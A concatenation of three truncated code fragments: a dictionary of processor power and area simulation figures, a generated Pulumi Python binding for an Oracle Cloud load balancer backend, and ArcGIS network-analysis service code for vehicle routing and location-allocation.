'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0519669,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30554,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175997,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176503,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68448,
'Instruction Fetch Unit/Runtime Dynamic': 0.431468,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00557278,
'L2/Runtime Dynamic': 0.00179075,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49535,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.607223,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0407067,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0407067,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68757,
'Load Store Unit/Runtime Dynamic': 0.848682,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100376,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200752,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356237,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356827,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205526,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.028925,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.42283,
'Memory Management Unit/Runtime Dynamic': 0.0646078,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6028,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786231,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.088943,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['BackendArgs', 'Backend']
@pulumi.input_type
class BackendArgs:
def __init__(__self__, *,
backend_set_name: pulumi.Input[str],
network_load_balancer_id: pulumi.Input[str],
port: pulumi.Input[int],
ip_address: Optional[pulumi.Input[str]] = None,
is_backup: Optional[pulumi.Input[bool]] = None,
is_drain: Optional[pulumi.Input[bool]] = None,
is_offline: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Backend resource.
:param pulumi.Input[str] backend_set_name: The name of the backend set to which to add the backend server. Example: `example_backend_set`
:param pulumi.Input[str] network_load_balancer_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network load balancer to update.
:param pulumi.Input[int] port: The communication port for the backend server. Example: `8080`
:param pulumi.Input[str] ip_address: The IP address of the backend server. Example: `10.0.0.3`
:param pulumi.Input[bool] is_backup: (Updatable) Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
:param pulumi.Input[bool] is_drain: (Updatable) Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
:param pulumi.Input[bool] is_offline: (Updatable) Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
:param pulumi.Input[str] name: Optional unique name identifying the backend within the backend set. If not specified, then one will be generated. Example: `webServer1`
:param pulumi.Input[str] target_id: The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
:param pulumi.Input[int] weight: (Updatable) The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
pulumi.set(__self__, "backend_set_name", backend_set_name)
pulumi.set(__self__, "network_load_balancer_id", network_load_balancer_id)
pulumi.set(__self__, "port", port)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_backup is not None:
pulumi.set(__self__, "is_backup", is_backup)
if is_drain is not None:
pulumi.set(__self__, "is_drain", is_drain)
if is_offline is not None:
pulumi.set(__self__, "is_offline", is_offline)
if name is not None:
pulumi.set(__self__, "name", name)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="backendSetName")
def backend_set_name(self) -> pulumi.Input[str]:
"""
The name of the backend set to which to add the backend server. Example: `example_backend_set`
"""
return pulumi.get(self, "backend_set_name")
@backend_set_name.setter
def backend_set_name(self, value: pulumi.Input[str]):
pulumi.set(self, "backend_set_name", value)
@property
@pulumi.getter(name="networkLoadBalancerId")
def network_load_balancer_id(self) -> pulumi.Input[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network load balancer to update.
"""
return pulumi.get(self, "network_load_balancer_id")
@network_load_balancer_id.setter
def network_load_balancer_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_load_balancer_id", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
The communication port for the backend server. Example: `8080`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of the backend server. Example: `10.0.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isBackup")
def is_backup(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
"""
return pulumi.get(self, "is_backup")
@is_backup.setter
def is_backup(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_backup", value)
@property
@pulumi.getter(name="isDrain")
def is_drain(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_drain")
@is_drain.setter
def is_drain(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_drain", value)
@property
@pulumi.getter(name="isOffline")
def is_offline(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_offline")
@is_offline.setter
def is_offline(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_offline", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Optional unique name identifying the backend within the backend set. If not specified, then one will be generated. Example: `webServer1`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class _BackendState:
def __init__(__self__, *,
backend_set_name: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_backup: Optional[pulumi.Input[bool]] = None,
is_drain: Optional[pulumi.Input[bool]] = None,
is_offline: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
network_load_balancer_id: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
target_id: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Backend resources.
:param pulumi.Input[str] backend_set_name: The name of the backend set to which to add the backend server. Example: `example_backend_set`
:param pulumi.Input[str] ip_address: The IP address of the backend server. Example: `10.0.0.3`
:param pulumi.Input[bool] is_backup: (Updatable) Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
:param pulumi.Input[bool] is_drain: (Updatable) Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
:param pulumi.Input[bool] is_offline: (Updatable) Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
:param pulumi.Input[str] name: Optional unique name identifying the backend within the backend set. If not specified, then one will be generated. Example: `webServer1`
:param pulumi.Input[str] network_load_balancer_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network load balancer to update.
:param pulumi.Input[int] port: The communication port for the backend server. Example: `8080`
:param pulumi.Input[str] target_id: The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
:param pulumi.Input[int] weight: (Updatable) The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
if backend_set_name is not None:
pulumi.set(__self__, "backend_set_name", backend_set_name)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_backup is not None:
pulumi.set(__self__, "is_backup", is_backup)
if is_drain is not None:
pulumi.set(__self__, "is_drain", is_drain)
if is_offline is not None:
pulumi.set(__self__, "is_offline", is_offline)
if name is not None:
pulumi.set(__self__, "name", name)
if network_load_balancer_id is not None:
pulumi.set(__self__, "network_load_balancer_id", network_load_balancer_id)
if port is not None:
pulumi.set(__self__, "port", port)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="backendSetName")
def backend_set_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the backend set to which to add the backend server. Example: `example_backend_set`
"""
return pulumi.get(self, "backend_set_name")
@backend_set_name.setter
def backend_set_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend_set_name", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of the backend server. Example: `10.0.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isBackup")
def is_backup(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the network load balancer should treat this server as a backup unit. | |
self.lineBarriers),
('polygon_barriers', self.polygonBarriers),
('use_hierarchy_in_analysis', self.useHierarchy),
('restrictions', self.restrictions),
('attribute_parameter_values', self.attributeParameterValues),
('travel_mode', self.portalTravelMode),
('populate_route_lines', self.populateRouteLines),
('route_line_simplification_tolerance', self.routeLineSimplicationTolerance),
('populate_directions', self.populateDirections),
('directions_language', self.directionsLanguage),
('directions_style_name', self.directionsStyleName),
('time_zone_usage_for_time_fields', self.timeZoneUsageForTimeFields),
('save_output_layer', self.saveLayerFile),
('overrides', self.overrides),
('save_route_data', self.saveRouteData),
('service_capabilities', service_limits),
]
#Fail if no orders are given
order_count = int(arcpy.management.GetCount(self.orders).getOutput(0))
if order_count == 0:
arcpy.AddIDMessage("ERROR", 30138)
raise InputError
#Determine the network dataset to use. If analysis region is specified use that as
#the network dataset layer name
self._selectNetworkDataset(self.orders, self.depots)
if self.connectionFile:
#Add remote tool
self.logger.debug(u"Adding remote service {0} from {1}".format(self.serviceName, self.connectionFile))
remote_tool_name, remote_toolbox = add_remote_toolbox(self.connectionFile, self.serviceName)
#specify parameter values for the remote tool
#need to pass boolean values for boolean parameters when calling the remote service
task_params = [self.orders, self.depots, self.routes, self.breaks, self.timeUnits, self.distanceUnits,
"#", self.timeOfDay, self.uTurnAtJunctions, self.timeWindowFactor,
self.spatiallyClusterRoutes, self.routeZones, self.routeRenewals, self.orderPairs,
self.excessTransitFactor, self.pointBarriers, self.lineBarriers, self.polygonBarriers,
self.useHierarchy, "#", self.attributeParameterValues, self.populateRouteLines,
self.routeLineSimplicationTolerance, self.populateDirections, self.directionsLanguage,
self.directionsStyleName, self.portalTravelMode, self.impedance,
self.timeZoneUsageForTimeFields, self.saveLayerFile, self.overrides, self.saveRouteData]
#remove any unsupported restriction parameters
if self.isCustomTravelMode:
remote_tool_param_info = arcpy.GetParameterInfo(remote_tool_name)
remote_tool_restriction_param = remote_tool_param_info[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX]
task_params[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX] = get_valid_restrictions_remote_tool(remote_tool_restriction_param,
self.restrictions)
#execute the remote tool
self.toolResult = execute_remote_tool(remote_toolbox, remote_tool_name, task_params)
result_severity = self.toolResult.maxSeverity
if result_severity == -1:
result_severity = arcpy.GetMaxSeverity()
#SolveVRP tool always produces some result even in case of failure
if result_severity != 2:
#Save the results
solve_status = self.toolResult.getOutput(4)
if solve_status.lower() == 'true':
self.solveSucceeded = True
arcpy.management.CopyRows(self.toolResult.getOutput(0), self.outputUnassignedStops)
arcpy.management.CopyRows(self.toolResult.getOutput(1), self.outputStops)
arcpy.management.CopyFeatures(self.toolResult.getOutput(2), self.outputRoutes)
arcpy.management.CopyFeatures(self.toolResult.getOutput(3), self.outputDirections)
self.outputLayer = self.toolResult.getOutput(5)
self.outputRouteData = self.toolResult.getOutput(6)
else:
#Add the network dataset that we wish to use.
user_parameters.append(("network_dataset", self.outputNDS))
#Get the time attribute, distance attribute and feature locator where clause from config file
nds_property_values = self._getToolParametersFromNDSProperties()
#Create a dict that contains all the tool parameters and call the tool.
tool_parameters = dict(nds_property_values + constant_params + user_parameters)
#Update time attribute and distance attribute when using custom travel mode.
if self.isCustomTravelMode:
tool_parameters["time_attribute"] = self.customTravelModeTimeAttribute
tool_parameters["distance_attribute"] = self.customTravelModeDistanceAttribute
#Check if inputs are within the max walking extent if perform walk type analysis
self._checkWalkingExtent(self.orders, self.depots)
#Call the big button tool
self._executeBigButtonTool(tool_parameters)
#get outputs from the result
solve_status = self.toolResult.getOutput(0)
if solve_status.lower() == 'true':
self.solveSucceeded = True
self.outputUnassignedStops = self.toolResult.getOutput(1)
self.outputStops = self.toolResult.getOutput(2)
self.outputRoutes = self.toolResult.getOutput(3)
self.outputDirections = self.toolResult.getOutput(4)
self.outputLayer = self.toolResult.getOutput(5)
self.outputRouteData = self.toolResult.getOutput(6)
#Fail if the count of features in directions exceeds the maximum number of records
#returned by the service
if self.populateDirections:
self._checkMaxOutputFeatures(self.outputDirections)
#generalize directions features
arcpy.edit.Generalize(self.outputDirections, self.routeLineSimplicationTolerance)
#Log messages from execution of remote tool or big button tool
self._logToolExecutionMessages()
#Add metering and royalty messages
#numObjects = number of routes with orders
num_objects = 0
with arcpy.da.SearchCursor(self.outputRoutes, "OrderCount", "OrderCount IS NOT NULL") as cursor:
for row in cursor:
num_objects += 1
if num_objects:
arcpy.gp._arc_object.LogUsageMetering(5555, self.__class__.__name__, num_objects)
arcpy.gp._arc_object.LogUsageMetering(9999, self.outputNDS, num_objects)
except InputError as ex:
self._handleInputErrorException(ex)
except arcpy.ExecuteError:
self._handleArcpyExecuteErrorException()
except Exception as ex:
self._handleException()
return
class EditVehicleRoutingProblem(SolveVehicleRoutingProblem):
'''EditVehicleRoutingProblem geoprocessing service'''
#Overwrites from base class
EXTENT_FIELDS = NetworkAnalysisService.EXTENT_FIELDS[:]
EXTENT_FIELDS[2] = "GPVehicleRoutingProblemSyncService"
#MAX_FEATURES = 10000
HELPER_SERVICES_KEY = "syncVRP"
class SolveLocationAllocation(NetworkAnalysisService):
'''SolveLocationAllocation geoprocessing service'''
OUTPUT_ALLOCATION_LINES_NAME = "AllocationLines"
OUTPUT_DEMAND_POINTS_NAME = "DemandPoints"
OUTPUT_FACILITIES_NAME = "Facilities"
OUTPUT_ROUTE_EDGES_NAME = "RouteEdges"
TRAVEL_DIR_KEYWORDS = {
"Facility to Demand" : "FACILITY_TO_DEMAND",
"Demand to Facility" : "DEMAND_TO_FACILITY"
}
PROBLEM_TYPE_KEYWORDS = {
"Maximize Attendance": "MAXIMIZE_ATTENDANCE",
"Maximize Capacitated Coverage": "MAXIMIZE_CAPACITATED_COVERAGE",
"Maximize Coverage" : "MAXIMIZE_COVERAGE",
"Maximize Market Share" : "MAXIMIZE_MARKET_SHARE",
"Minimize Facilities" : "MINIMIZE_FACILITIES",
"Minimize Impedance" : "MINIMIZE_IMPEDANCE",
"Target Market Share" : "TARGET_MARKET_SHARE"
}
EXTENT_FIELDS = NetworkAnalysisService.EXTENT_FIELDS[:]
EXTENT_FIELDS[2] = "GPLocationAllocationService"
#MAX_FEATURES = 1000000
REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX = 19
TOOL_NAME = "SolveLocationAllocation_na"
HELPER_SERVICES_KEY = "asyncLocationAllocation"
def __init__(self, *args, **kwargs):
'''Constructor'''
#Call the base class constructor to sets the common tool parameters as instance attributes
super(SolveLocationAllocation, self).__init__(*args, **kwargs)
#Store tool parameters as instance attributes
self.facilities = kwargs.get("Facilities", None)
self.demandPoints = kwargs.get("Demand_Points", None)
self.problemType = kwargs.get("Problem_Type", None)
self.facilitiesToFind = kwargs.get("Number_of_Facilities_to_Find", None)
self.deafultMeasurementCutoff = kwargs.get("Default_Measurement_Cutoff", None)
if self.deafultMeasurementCutoff:
try:
self.deafultMeasurementCutoff = str_to_float(self.deafultMeasurementCutoff)
except ValueError as ex:
self.deafultMeasurementCutoff = None
self.defaultCapacity = kwargs.get("Default_Capacity", None)
self.targetMarketShare = kwargs.get("Target_Market_Share", None)
self.travelDirection = kwargs.get("Travel_Direction", None)
self.measurementTransformationModel = kwargs.get("Measurement_Transformation_Model", None)
self.measurementTransformationFactor = kwargs.get("Measurement_Transformation_Factor", None)
self.allocationLineShape = kwargs.get("Allocation_Line_Shape", None)
#Print tool parameter values for debugging
if self.logger.DEBUG:
for param in sorted(kwargs):
self.logger.debug(u"{0}: {1}".format(param, kwargs[param]))
#derived outputs
self.outputAllocationLines = os.path.join(self.outputGeodatabase, self.OUTPUT_ALLOCATION_LINES_NAME)
self.outputDemandPoints = os.path.join(self.outputGeodatabase, self.OUTPUT_DEMAND_POINTS_NAME)
self.outputFacilities = os.path.join(self.outputGeodatabase, self.OUTPUT_FACILITIES_NAME)
def execute(self):
'''Main execution logic'''
try:
arcpy.CheckOutExtension("network")
#Get the properties for all network datasets from a propeties file.
self._getNetworkDatasetProperties()
#Select the travel mode
self._selectTravelMode()
#Get the values for big button tool parameters that are used as constraints
service_limits = self._getServiceCapabilities()
self.logger.debug("Service Limits: {0}".format(service_limits))
#Define values for big button tool parameters that are not specified from the service
constant_params = [('Maximum_Snap_Tolerance', '20 Kilometers'),
('Accumulate_Attributes', []),
('Output_Geodatabase', self.outputGeodatabase),
('Output_Allocation_Lines_Name', self.OUTPUT_ALLOCATION_LINES_NAME),
('Output_Demand_Points_Name', self.OUTPUT_DEMAND_POINTS_NAME),
('Output_Facilities_Name', self.OUTPUT_FACILITIES_NAME),
('Output_Route_Edges_Name', self.OUTPUT_ROUTE_EDGES_NAME),
]
#Create a list of user defined parameter names and their values
user_parameters = [('Facilities', self.facilities),
('Demand_Points', self.demandPoints),
('Measurement_Units', self.measurementUnits),
('Problem_Type', self.PROBLEM_TYPE_KEYWORDS[self.problemType]),
('Number_of_Facilities_to_Find', self.facilitiesToFind),
('Default_Measurement_Cutoff', self.deafultMeasurementCutoff),
('Default_Capacity', self.defaultCapacity),
('Target_Market_Share', self.targetMarketShare),
('Measurement_Transformation_Model', self.measurementTransformationModel),
('Measurement_Transformation_Factor', self.measurementTransformationFactor),
('Travel_Direction', self.TRAVEL_DIR_KEYWORDS[self.travelDirection]),
('Time_of_Day', self.timeOfDay),
('Time_Zone_for_Time_of_Day', self.TIME_ZONE_USAGE_KEYWORDS[self.timeZoneUsage]),
('UTurn_Policy', self.UTURN_KEYWORDS[self.uTurnAtJunctions]),
('Allocation_Line_Shape', self.ROUTE_SHAPE_KEYWORDS[self.allocationLineShape]),
('Point_Barriers', self.pointBarriers),
('Line_Barriers', self.lineBarriers),
('Polygon_Barriers', self.polygonBarriers),
('Use_Hierarchy_in_Analysis', self.useHierarchy),
('Restrictions', self.restrictions),
('Attribute_Parameter_Values', self.attributeParameterValues),
('Travel_Mode', self.portalTravelMode),
('Save_Output_Network_Analysis_Layer', self.saveLayerFile),
('Overrides', self.overrides),
]
#Fail if no facilities or demand points are given
demand_point_count = int(arcpy.management.GetCount(self.demandPoints).getOutput(0))
facility_count = int(arcpy.management.GetCount(self.facilities).getOutput(0))
if demand_point_count == 0 or facility_count == 0:
arcpy.AddIDMessage("ERROR", 30139)
raise InputError
#Determine the network dataset to use. If analysis region is specified use that as
#the network dataset layer name
self._selectNetworkDataset(self.demandPoints, self.facilities)
if self.connectionFile:
#Add remote tool
self.logger.debug(u"Adding remote service {0} from {1}".format(self.serviceName, self.connectionFile))
remote_tool_name, remote_toolbox = add_remote_toolbox(self.connectionFile, self.serviceName)
#specify parameter values for the remote tool
#need to pass boolean values for boolean parameters when calling the remote service
task_params = [self.facilities, self.demandPoints, self.measurementUnits, "#", self.problemType,
self.facilitiesToFind, self.deafultMeasurementCutoff, self.defaultCapacity,
self.targetMarketShare, self.measurementTransformationModel,
self.measurementTransformationFactor, self.travelDirection, self.timeOfDay,
self.timeZoneUsage, self.uTurnAtJunctions, self.pointBarriers, self.lineBarriers,
self.polygonBarriers, self.useHierarchy, "#", self.attributeParameterValues,
self.allocationLineShape, self.portalTravelMode, self.impedance, self.saveLayerFile,
self.overrides]
#remove any unsupported restriction parameters when using a custom travel mode
if self.isCustomTravelMode:
remote_tool_param_info = arcpy.GetParameterInfo(remote_tool_name)
remote_tool_restriction_param = remote_tool_param_info[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX]
task_params[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX] = get_valid_restrictions_remote_tool(remote_tool_restriction_param,
self.restrictions)
#execute the remote tool
self.toolResult = execute_remote_tool(remote_toolbox, remote_tool_name, task_params)
#report errors and exit in case the remote tool failed.
if self.toolResult.maxSeverity == 2:
error_messages = self.toolResult.getMessages(1) + self.toolResult.getMessages(2)
raise InputError(error_messages)
else:
#Save the results
solve_status = self.toolResult.getOutput(0)
if solve_status.lower() == 'true':
self.solveSucceeded = True
arcpy.management.CopyFeatures(self.toolResult.getOutput(1), self.outputAllocationLines)
arcpy.management.CopyFeatures(self.toolResult.getOutput(2), self.outputFacilities)
arcpy.management.CopyFeatures(self.toolResult.getOutput(3), self.outputDemandPoints)
self.outputLayer = self.toolResult.getOutput(4)
else:
#Add the network dataset that we wish to use.
user_parameters.append(("Network_Dataset", self.outputNDS))
#Get the time attribute, distance attribute and feature locator where clause from config file
nds_property_values = self._getToolParametersFromNDSProperties()
#Create a dict that contains all the tool parameters and call the tool.
tool_parameters = dict(nds_property_values + constant_params + user_parameters)
tool_parameters.update(service_limits)
if self.isCustomTravelMode:
tool_parameters["Time_Attribute"] = self.customTravelModeTimeAttribute
tool_parameters["Distance_Attribute"] = self.customTravelModeDistanceAttribute
#Update time attribute and distance attribute when using custom travel mode.
self._checkWalkingExtent(self.demandPoints, self.facilities)
#Call the big button tool
self._executeBigButtonTool(tool_parameters)
#get outputs from the result
solve_status = self.toolResult.getOutput(0)
if solve_status.lower() == 'true':
self.solveSucceeded = True
self.outputAllocationLines = self.toolResult.getOutput(1)
self.outputFacilities = self.toolResult.getOutput(2)
self.outputDemandPoints = self.toolResult.getOutput(3)
self.outputLayer = self.toolResult.getOutput(5)
#Log messages from execution of remote or big button tool
self._logToolExecutionMessages()
#Fail if the count of features in output demand points exceeds the maximum number of records returned by
#the service
self._checkMaxOutputFeatures(self.outputDemandPoints, 30170)
#Add metering and royalty messages
#numObjects = number of allocated demand points
output_demand_points_layer = "OutputDemandPointsLayer"
allocated_demand_points_where_clause = "FacilityOID IS NOT NULL"
arcpy.management.MakeFeatureLayer(self.outputDemandPoints, output_demand_points_layer,
allocated_demand_points_where_clause)
num_objects = int(arcpy.management.GetCount(output_demand_points_layer).getOutput(0))
if num_objects:
arcpy.gp._arc_object.LogUsageMetering(5555, self.__class__.__name__, num_objects)
arcpy.gp._arc_object.LogUsageMetering(9999, self.outputNDS, num_objects)
except InputError as ex:
self._handleInputErrorException(ex)
except arcpy.ExecuteError:
self._handleArcpyExecuteErrorException()
except Exception as ex:
self._handleException()
return
class GenerateOriginDestinationCostMatrix(NetworkAnalysisService):
'''GenerateOriginDestinationCostMatrix geoprocessing service'''
OUTPUT_OD_LINES_NAME = "ODLines"
OUTPUT_ORIGINS_NAME = "Origins"
OUTPUT_DESTINATIONS_NAME = "Destinations"
EXTENT_FIELDS = NetworkAnalysisService.EXTENT_FIELDS[:]
EXTENT_FIELDS[2] = "GPOriginDestinationCostMatrixService"
